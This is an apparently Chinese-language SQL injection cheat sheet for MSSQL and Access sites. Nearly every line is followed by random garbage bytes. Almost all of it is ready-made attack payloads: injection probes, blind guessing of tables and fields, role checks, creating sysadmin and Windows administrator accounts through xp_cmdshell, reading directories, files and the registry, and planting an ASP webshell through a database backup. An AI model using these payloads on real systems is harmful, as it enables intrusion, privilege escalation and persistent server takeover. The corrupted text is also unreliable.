1.判断是否有注入;and 1=1 ;and 1=2 �{xt<`_��R
2.初步判断是否是mssql ;and user>0 !D%*s�,t\'
A"�R��zn1/
3.注入参数是字符'and [查询条件] and ''=' �%5�RYa<oP
@�M4�~,O6-
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ^ j@Q2>�&?
Kq��`L�u�f
5.判断数据库系统 ��|6B:tw/.
*R�s�hzv[�
;and (select count(*) from sysobjects)>0 mssql *MkhRL�w\,
� L�}�A�R{
;and (select count(*) from msysobjects)>0 access �!mL,U�e3/
ac.�O�#6�&
\�E.t=XBn�
1�4�\%2nE�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 .�]Z��M2��
{�mL��/)�\
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 f7X�#�cs)a
&�tZ?%s�r�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 UA�,&0.7�
�M�C�Q�>BP
9.(1)猜字段的ascii值(access) �oO �@6c�%
�'�KQ��]7
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 W<2%J�)N<
uYL6g:]+ZC
(2)猜字段的ascii值(mssql) )F? 5�7eh�
P0Na<)\'Y!
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 !N,Z3p>�Q
5� L��X�3.
10.测试权限结构(mssql) z�$G?�J+?J
p�%�I�R4f
>^:g[6S�j�
nA�F�@47Wo
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �v\��-"NHl
s��N�v�T�0
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- '�*��>LZo4
t�@.gmUU�A
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 7OtQK`P"A�
`P/*�x[��?
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- U�`6QD}c"s
�i�*�_K�HK
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- p{Pa�(Z]�G
W~k!q�y �`
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- [��&nwB!kt
U�]R�?�O5K
;and 1=(select IS_MEMBER('db_owner'));-- 8tA.d���.8
�wt2S[:!p�
3N+P~�v)T'
,_rarU)[�J
11.添加mssql和系统的帐户 =����L�a}^
9���b]U&A$
;exec master.dbo.sp_addlogin username;-- ei�E�Ztu��
;exec master.dbo.sp_password null,username,password;-- F:pXdU-�xf
�v/+���dx/
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- *,
*��"G?�
FZ��=6x}QZ
;exec master.dbo.xp_cmdshell 'net user username password cY�R6+PKua
bw�Vv�#Z\r
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- a
#@�Q�.wL
YGW�b�!|Z$
;exec master.dbo.xp_cmdshell 'net user username password /add';-- +1d\ZZA|6&
V"$�t>pAG�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �S�a,N1r��
'EZ[�aY!);
EE��}NA{b�
}#'��KM�E4
12.(1)遍历目录 Nr`nL_D�Q�
l�R�.a3.�~
;create table dirs(paths varchar(100), id int) 2�)j\Lg�_M
1.,�mNY^UN
;insert dirs exec master.dbo.xp_dirtree 'c:\' d�`~#uN {
F�G#j0#�|*
;and (select top 1 paths from dirs)>0 c�+a� f=ac
f{�Ag�KW9"
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) i��"rM�P#7
a|n�lmH"�l
_�9z�/�>�e
+=k?��Dp[
(2)遍历目录
=o��Qz�L�
rG\m]C3��E
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- Cz�v�lZD�o
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �'R,�d?ikY
�ZC2C`S\xr
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 5?�O/Aub��
Q�`vy��DoF
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ?>%u�[�g �
k5/nA�aiVE
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ,x���Tbt4J
�Y~vTF��OI
_5`M( ;hL2
K&)a3Z�=(.
13.mssql中的存储过程 ]�#BXaBVMY
�}qKeX4\-
xp_regenumvalues 注册表根键, 子键 >`{i�[60r�
{Y0I A97,�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 (�Wx)�YI
=k$d�8g
ez
xp_regread 根键,子键,键值名 Q%eBm_r;�
`|/|ej]$�P
;exec xp_regread �VBH�[aI�W
��Nb];LCx�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 %M`|0g�}!�
%<M<'jxSca
xp_regwrite 根键,子键, 值名, 值类型, 值 �u^]yz&9V�
p� �+T&��9
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �D~?kvyJ�
��P);X�ke
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 )K?G�Aj]Pq
! 4o��Ix�`
xp_regdeletevalue 根键,子键,值名 �Qy7�0/on9
��VuPET��
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 dt \O7Rjw8
�<oXs�n.'\
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 i3%~G�c63�
~qqtFj�lG^
J.�nVE�qLZ
�xlwsZm{V
14.mssql的backup创建webshell 'I<j`)4`�d
��iit`'}+U
use model N�)!v-z�,k
[e}�]K�:��
create table cmd(str image); ky~�x4�_y5
&(rd{j/*�
insert into cmd(str) values (''); Dq?2m�XOqD
�SRD�&Uf0M
backup database model to disk='c:\l.asp'; Rke:*(p*n;
^�=W&p%Y(!
TdE_\gEo/R
f�.f4<_v'h
15.mssql内置函数 Z|/)�:nVP7
F4&N;Zm2�
;and (select @@version)>0 获得Windows的版本号 �&.z�/dFmG
�]rN�fr�-
;and user_name()='dbo' 判断当前系统的连接用户是不是sa +[qkG.
�O�
L_.}z�)S[\
;and (select user_name())>0 爆当前系统的连接用户 K%gFD?{^q�
b>�7t�s_b�
;and (select db_name())>0 得到当前连接的数据库 |M?HdxPa��
UF%5/SiVX
3L�xJ}>]TO
|X�.z|wKT6
16.简洁的webshell q�#a21~S<�
,�9p��i9\S
use model )KuvG�:+9W
��?oJ~3K�g
create table cmd(str image); 5&kR1Bp#�-
R:xmcUq}
(
insert into cmd(str) values (''); �
vXvV�5Oq
��@T�prS�d
backup database model to disk='g:\wwwtest\l.asp';
